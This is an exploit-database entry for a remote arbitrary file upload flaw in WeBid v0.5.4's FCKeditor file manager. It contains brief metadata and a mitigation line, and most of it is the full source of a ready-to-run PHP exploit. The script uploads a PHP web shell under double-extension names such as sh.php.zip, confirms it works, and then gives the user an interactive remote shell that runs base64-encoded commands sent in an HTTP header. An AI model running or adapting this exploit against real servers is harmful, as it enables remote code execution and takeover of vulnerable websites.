header-logo
Suggest Exploit
vendor:
WeBid
by:
Stack
7.5
CVSS
HIGH
Remote Arbitrary File Upload
434
CWE
Product Name: WeBid
Affected Version From: v0.5.4
Affected Version To: v0.5.4
Patch Exists: YES
Related CWE: N/A
CPE: a:webid:webid:0.5.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

WeBid v0.5.4 (fckeditor) Remote Arbitrary File Upload Exploit

An attacker might be able to upload arbitrary files containing malicious PHP code due to multiple file extensions not being properly checked.

Mitigation:

Ensure that all file extensions are properly checked before allowing uploads.
Source

Exploit-DB raw data:

<?php
/*
 -----------------------------------------------------------------
 WeBid v0.5.4 (fckeditor) Remote Arbitrary File Upload Exploit
 -----------------------------------------------------------------
 
 author...: Stack
 
 [-] vulnerable code in /fck/editor/filemanager/browser/mcpuk/connectors/php/config.php
 
 121. //File Area
 122. $fckphp_config['ResourceAreas']['File'] =array(
 123.  
 124.  //Files(identified by extension) that may be uploaded to this area
 125.  'AllowedExtensions' => array("zip","doc","xls","pdf","rtf","csv","jpg","gif","jpeg","png","avi","mpg","mpeg","swf","fla"),
 
 with a default configuration of this script, an attacker might be able to upload arbitrary
 files containing malicious PHP code due to multiple file extensions isn't properly checked
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
 $sock = fsockopen($host, 80);
 while (!$sock)
 {
  print "\n[-] No response from {$host}:80 Trying again...";
  $sock = fsockopen($host, 80);
 }
 fputs($sock, $packet);
 while (!feof($sock)) $resp .= fread($sock, 1024);
 fclose($sock);
 return $resp;
}
function upload()
{
 global $host, $path;
 
 $connector = "fck/editor/filemanager/browser/mcpuk/connectors/php/connector.php";
 $file_ext  = array("zip", "swf", "fla", "doc", "xls", "rtf", "csv");
 
 foreach ($file_ext as $ext)
 {
  print "\n[-] Trying to upload with .{$ext} extension...";
  
  $data  = "--12345\r\n";
  $data .= "Content-Disposition: form-data; name=\"NewFile\"; filename=\"sh.php.{$ext}\"\r\n";
  $data .= "Content-Type: application/octet-stream\r\n\r\n";
  $data .= "<?php \${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))}.\${print(_code_)} ?>\r\n";
  $data .= "--12345--\r\n";
  
  $packet  = "POST {$path}{$connector}?Command=FileUpload&CurrentFolder={$path} HTTP/1.0\r\n";
  $packet .= "Host: {$host}\r\n";
  $packet .= "Content-Length: ".strlen($data)."\r\n";
  $packet .= "Content-Type: multipart/form-data; boundary=12345\r\n";
  $packet .= "Connection: close\r\n\r\n";
  $packet .= $data;
  
  preg_match("/OnUploadCompleted\((.*),'(.*)'\)/i", http_send($host, $packet), $html);
  
  if (!in_array(intval($html[1]), array(0, 201))) die("\n[-] Upload failed! (Error {$html[1]}: {$html[2]})\n");
  
  $packet  = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
  $packet .= "Host: {$host}\r\n";
  $packet .= "Connection: close\r\n\r\n";
  $html    = http_send($host, $packet);
  
  if (!eregi("print", $html) and eregi("_code_", $html)) return $ext;
  
  sleep(1);
 }
 
 return false;
}
print "\n+--------------------------------------------------------------------+";
print "\n|WeBid v0.5.4 (fckeditor) Remote Arbitrary File Upload Exploit by Stack|";
print "\n+--------------------------------------------------------------------+\n";
if ($argc < 3)
{
 print "\nUsage......: php $argv[0] host path\n";
 print "\nExample....: php $argv[0] localhost /";
 print "\nExample....: php $argv[0] localhost /WeBid/\n";
 die();
}
$host = $argv[1];
$path = $argv[2];
if (!($ext = upload())) die("\n\n[-] Exploit failed...\n");
else print "\n[-] Shell uploaded...starting it!\n";
define(STDIN, fopen("php://stdin", "r"));
while(1)
{
 print "\nStack-shell# ";
 $cmd = trim(fgets(STDIN));
 if ($cmd != "exit")
 {
  $packet = "GET {$path}sh.php.{$ext} HTTP/1.0\r\n";
  $packet.= "Host: {$host}\r\n";
  $packet.= "Cmd: ".base64_encode($cmd)."\r\n";
  $packet.= "Connection: close\r\n\r\n";
  $html   = http_send($host, $packet);
  if (!eregi("_code_", $html)) die("\n[-] Exploit failed...\n");
  $shell = explode("_code_", $html);
  print "\n{$shell[1]}";
 }
 else break;
}
?>

# milw0rm.com [2008-09-01]